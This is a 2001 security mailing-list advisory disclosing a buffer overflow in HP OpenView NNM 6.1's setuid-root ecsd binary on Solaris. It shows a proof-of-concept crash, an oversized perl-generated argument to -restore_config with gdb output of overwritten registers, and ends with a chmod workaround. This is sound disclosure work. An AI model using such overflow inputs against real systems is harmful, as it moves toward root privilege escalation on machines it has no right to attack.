Date: Wed, 23 May 2001 18:00:57 +0200 (CEST)
From: Jonas Eriksson <[email protected]>
To: [email protected]Subject: HP OpenView NNM v6.1 buffer overflow
HP OpenView NNM v6.1 buffer overflow
The problem..
HP OpenView NNM v6.1 has a buffer overflow in the suid-root file ecsd
located in the /opt/OV/bin/ directory.
ecsd is not used in NNM, but is shipped and installed suid-root as default.
Details..
je@openview~> uname -a
SunOS openview 5.8 Generic_108528-07 sun4u sparc SUNW,UltraSPARC-IIi-Engine
je@openview~> ls -la /opt/OV/bin/ecsd
-r-sr-xr-x 1 root bin 2953640 maj 18 11:20 /opt/OV/bin/ecsd
je@openview~> pwd
/
je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x312'`
Failed to restore engine
configuration; "//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[snip..]" not found.
je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x313'`
Segmentation fault (core dumped)
je@openview~> gdb /opt/OV/bin/ecsd --core=core
[snip..]
Core was generated by `/opt/OV/bin/ecsd -restore_config AAAAAAAA[snip..]'.
[snip..]
#0 0x28eb8 in main ()
(gdb) inf reg
[snip..]
l1 0x41414141 1094795585
l2 0x41414141 1094795585
l3 0x41414141 1094795585
l4 0x41414141 1094795585
l5 0x41414141 1094795585
l6 0x41414141 1094795585
l7 0x41414141 1094795585
i0 0x41414141 1094795585
i1 0x41414141 1094795585
i2 0x41414141 1094795585
i3 0x41414141 1094795585
i4 0x41414141 1094795585
i5 0x41414141 1094795585
fp 0x41410028 1094778920
[snip..]
(gdb)
Vendor Status..
Hewlett-Packard has been contacted. They are currently working on patches
for this vulnerability.
Workaround..
chmod -s /opt/OV/bin/ecsd
This will remove the setuid bit from /opt/OV/bin/ecsd, therefore if
someone does exploit this vulnerability, they won't gain higher privileges.
Regards
Jonas Eriksson
